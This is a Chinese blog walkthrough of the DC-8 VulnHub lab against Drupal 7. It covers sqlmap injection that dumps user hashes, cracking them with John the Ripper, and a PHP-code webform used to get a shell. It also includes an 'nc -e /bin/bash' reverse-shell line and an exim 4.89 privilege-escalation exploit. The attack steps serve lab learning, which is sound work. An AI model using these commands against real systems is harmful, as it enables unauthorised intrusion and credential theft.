【CyberSecurityLearning 77】DC系列之DC-8渗透测试(Drupal)

最新推荐文章于 2023-12-20 22:54:55 发布
最新推荐文章于 2023-12-20 22:54:55 发布
阅读量722 收藏
点赞数
分类专栏: CyberSecurityLearning 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waffle666/article/details/116667295
版权

目录

DC-7靶机渗透测试

1、信息收集

1.1 扫描DC-8开放端口

1.2 访问WEB站点

2、渗透过程

2.1 用Sqlmap自动化工具注入

2.2 drush 命令对任意用户密码进行更改(发现没有进到DC-8的shell,行不通)

2.3 John爆破用户名和密码

2.3 用john用户的密码turtle登录后台

3、GetShell(利用php代码执行漏洞)

4、提权

4.1 exim4提权

 

DC-8靶机渗透测试

实验环境:

kali的IP地址:192.168.43.121
DC-8的MAC地址:00:0C:29:6F:4B:D3(192.168.43.33)

1、信息收集

1.1 扫描DC-8开放端口

得知开放了22端口和80端口、是一个Drupal 7 cms管理系统。

1.2 访问WEB站点

各个选项卡点开看看,发现可能存在SQL注入漏洞

 

2、渗透过程

2.1 用Sqlmap自动化工具注入

sqlmap -u "http://192.168.43.33/?nid=1" --batch   (检测注入点)

sqlmap -u "http://192.168.43.33/?nid=1" --dbs(列出所有数据库名字)

sqlmap -u "http://192.168.43.33/?nid=1" --current-db (列出当前数据库的名字:'d7db'

sqlmap -u "http://192.168.43.33/?nid=1"  -D "d7db" --tables(-D指定数据库,--tables列出表名,发现users表)

sqlmap -u "http://192.168.43.33/?nid=1"  -D "d7db" -T "users" --columns(-T指定表名,--columns列出所有字段,对pass字段和name字段比较感兴趣)

sqlmap -u "http://192.168.43.33/?nid=1" -D "d7db" -T "users" -C "pass/name" --dump (-C指定列名,--dump列出字段内容)

 

发现存在admin和john这两个用户
admin的密码加密后为:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john的密码加密后为:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

2.2 drush 命令对任意用户密码进行更改(发现没有进到DC-8的shell,行不通)

drush是drupal shell专门管理drupal站点的shell

尝试对admin用户的密码做更改!

drupal中用drush更改密码的命令:
$ drush user:password admin "123456"
或者:$drush user-password admin --password="123456"

2.3 John爆破用户名和密码

著名密码破解利器John the Ripper(使用:https://www.jianshu.com/p/5ee11fb0414e

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
将上述密文写到一个文件里面:vim drupal_v7_admin_hash.txt

john drupal_v7_admin_hash.txt    跑了好久没有解出密码

发现admin的hash并没有解出,再将john用户的hash放入到drupal_v7_john_hash.txt文件中,用john再默认跑一下
vim drupal_v7_john_hash.txt
得到john密码为turtle

注意vim的时候复制完密文后一定要检查对不对

现在知道数据库dbd7的john用户的密码为turtle

2.3 用john用户的密码turtle登录后台

查看robots.txt

 

发现/user/login好像是登录后台的界面,登录成功

3、GetShell(利用php代码执行漏洞)

在john的登录界面到处看看,终于在Contact Us界面找到了写shell的地方

再Contact Us发现php代码执行漏洞

该漏洞在表单提交时才会触发

这里自带的格式不要删除,否者会后端读取的时候会报错导致无法执行php代码!!!(否则getshell会不成功)

save之后 回到VIEW界面

提交表单(在此之前需要监听对应端口)【在kali上nc -lvvp 8888】

成功getshell!

进入交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

4、提权

思路1、sudo -l(需要密码,执行不通X)

思路2、查看有没有一些具有suid权限的命令

find / -perm /4000 2>dev/null

4.1 exim4提权

4.1.1 查看exim4版本

/usr/sbin/exim4 --version

发现版本是4.89

4.1.2 使用searchsploit查找响应漏洞

searchsploit exim 4.

 Local Privilege Escalation(本地特权升级)

4.1.3 将响应漏洞拷贝到靶机

scp远程拷贝

    把它弄到靶机里,使用scp:
    需要先在kali开启ssh服务------Kali ssh服务
$ scp root@192.168.43.121:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/  (在dc8user@dc-8:~$下拷贝)

确认已经拷过来了

运行EXP:

有个^M,查看此exp后,看到结尾都是M,百度后的文章:
解决“/bin/bash^M: bad interpreter: No such file or directory”
sed -i "s/\r//" 46996.sh

重新执行exp,先监听kali上的8888端口:
./46996.sh -m netcat
nc -e /bin/bash 192.168.43.121 8888

这里很快就会断链了,所以要快点!!!:
python -c 'import pty;pty.spawn("/bin/bash")'

到/root下发现有flag.txt

 

Wαff1ε
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Droopy v0.2 靶机渗透(drupal 7.3版本漏洞)
afei001
08-14 323
目录 练习环境 1.发现靶机,端口扫描 2.网站探测 3.尝试查找drupal7.3版本漏洞 4.尝试MSF的Drupal漏洞拿下shell 5.尝试内核漏洞提权 6.继续探测获取flag 总结 练习环境 攻击机:kali 靶机:Droopy: v0.2 下载地址:https://download.vulnhub.com/droopy/DroopyCTF.ova 1.发现靶机,端口扫描 root@kali:~# netdi...
一次Drupal渗透测试
BROTHERYY的博客
03-19 1804
此次评估的环境为:1台web服务器 服务需求:该服务器对外提供web服务 网络实际应用:10.35.0.211 实际ip分配:10.35.0.245 自身环境为:win7+kali 使用工具:whatweb、nmap、msf、nc 以下所有操作都是在得到授权后进行 —————————————————————————————————————— 首先进行信息搜集,使用whatweb查看网站信息 将所...
CyberSecurityLearning 70】DC系列DC-1渗透测试Drupal
_Co1a
04-18 747
目录 DC-1 靶机入侵实战 背景资料: 知识点 一、实验环境 二、实验要求 三、渗透过程演示 Flag1: Flag2: Flag3: Flag4: Flag5: DC-1 靶机入侵实战 背景资料: vulnhub 地址: https://www.vulnhub.com/entry/dc-1-1,292/ There are multiple ways of gaining root, however, I have included some flags whic.
渗透测试Drupal 漏洞 CVE-2018-7600 远程代码执行-复现
SunnyCat
01-11 8949
Drupal 漏洞 CVE-2018-7600 远程代码执行-复现 漏洞简介: Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 漏洞原理: drupal的注册页面,当我们提交的数据有问题时,它
Vulnhub靶场渗透测试系列DC-1(Drupal漏洞)
qq_45722813的博客
11-14 4745
Vulnhub渗透测试系列-DC-1 靶机下载 地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机使用kali2021的VMware虚拟机,IP地址:192.168.172.131 在VMware中导入靶机,中间可能出现这个问题,直接点击【重试】 导入之后将网络模式设置为NAT模式 开启靶机虚拟机过程出现下面这个,点击【是】或【否】都可 虚拟机已开启 在kali攻击机中使用命令nmap -Pn 192.168.172.1/24扫描,进行主机发现,获取靶机的IP地址,
adminic-toolbar:替代Drupal 8工具栏
05-12
管理工具栏Drupal 8的替代工具栏 现代外观。 它总是放在您网站的左侧。 yml文件中的配置和链接定义。 可以包含自定义窗口小部件。 链接分为几部分。安装启用管理工具栏模块。 在管理工具栏部分的用户个人资料中,...
drupal8-vagrant:简单的Drupal 8开发环境
02-06
【标签】:“php vagrant packagist composer drupal php7 development-environment drupal-7 drupal-8 backdrop beetbox sprintbox code-sprint VagrantShell” 这些标签揭示了项目所涉及的关键技术和工具: 1. *...
gulp-drupal-stack:用于Drupal主题和模块的OVH Gulp任务
05-28
这个堆栈核心将包含在您的主项目中,并设置了许多Gulp任务,这些任务可以通过传入不同的config对象(可以基于gulpfile.default.yml (并与之合并))以多种灵活的方式工作。 特征 SCSS =>使用LibSass,PostCSS,...
fepper-drupalDrupal的Fepper
02-19
用于网站快速原型制作的前端原型工具Fepper的此发行版具有为Drupal 8配置的模板以及为容纳这些模板而构建的。 为了使该项目适应Drupal 7,请遵循。 如果您不需要与Drupal交互,。模板重用对source/03-templates中的...
ansible-role-drupal:Ansible角色-Drupal
02-01
8. **安全性**:执行安全最佳实践,如设置正确的文件权限,确保 Drupal 安装的安全性。 **使用ansible-role-drupal** 1. **安装角色**:首先,你需要在你的项目目录中添加这个角色,可以通过`git clone`或者使用`...
【废了-准备删除01】渗透测试靶机搭建——基于WAMP的drupal7.x管理系统
Fighting_hawk的博客
03-22 4472
1. 本节主要是为后续进行渗透测试实验准备好靶机平台。
CyberSecurityLearning 76】DC系列DC-7渗透测试Drupal
_Co1a
05-09 866
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
VULNHUB靶机渗透--DC-1(drupal)
aarong的博客
12-16 995
1. nmap扫描 nmap -A 192.168.65.131 发现开启了22、80、111端口 2. 浏览器打开靶机开启的网站服务 发现是一个网站登陆界面 3. whatweb扫描出网站模板信息 网站模板是drupal,版本信息是drupal 7 4. 针对这个版本搜索渗透模块 searchsploit drupal 7 运用这个渗透模块: Drupal 7.0 < 7.31 - ‘Drupalgeddon’ SQL Injection (Add Admin User) cat /us
[网络安全学习篇76]:渗透测试实战-DC-8-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-27 1332
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
DC系列DC-8靶机渗透练习
serendipity1130的博客
08-31 382
DC-8靶机: 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.152 2.nmap扫描端口: nmap 192.168.225.152 -sV -sC -Pn -n -v -T5 -p- 扫描到22和80端口,访问80端口 3.访问一下,看到drupal框架,点击任意链接,发现类似注入点的地方,测试发现是数字型注入 4.sqlmap可以流程化的跑一跑: python sqlmap.py -u "http://192.168.225.152/?nid=..
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2060
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-8靶机渗透
whylon的博客
07-26 430
DC-8靶机渗透 文章目录DC-8靶机渗透信息收集漏洞利用获得shell提权 请勿用文章中的手段进行违法攻击,做守法公民,利用文中手段造成不良行为后果本文作者概不负责 信息收集 首先发现存活主机 发现目标主机ip为192.168.11.132,我们的kali ip为192.168.11.129,现在我们探测敏感目录 使用dirsearch工具首先没安装的要安装 apt-get install dirsearch #安装dirsearch dirsearch -u "http://192.168.11.13
DC-8靶机进行渗透测试
zll___的博客
03-24 463
DC-8靶机进行渗透测试
DC-8靶场
2301_76690905的博客
12-20 1317
下载后解压会有一个DC-8.ova文件。在网页里到处点击,找到了可以执行php代码的地方,可以执行Php代码的地方在,联系我们-->WEBFROM-->Form settings的地方,选择php code。-p, --path [EDB-ID] 显示漏洞利用的完整路径(如果可能,还将路径复制到剪贴板),后面跟漏洞ID号。使用“-v”(详细)来尝试更多的组合。
drupal-cve2019-6340
最新发布
05-25
Drupal-cve2019-6340是Drupal内容管理系统(CMS)的一个安全漏洞。它被标记为“严重”的漏洞,可以允许攻击者执行任意代码,从而完全控制受影响的Drupal网站。 该漏洞存在于Drupal 8.6.x版本和8.5.x版本中,如果未...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值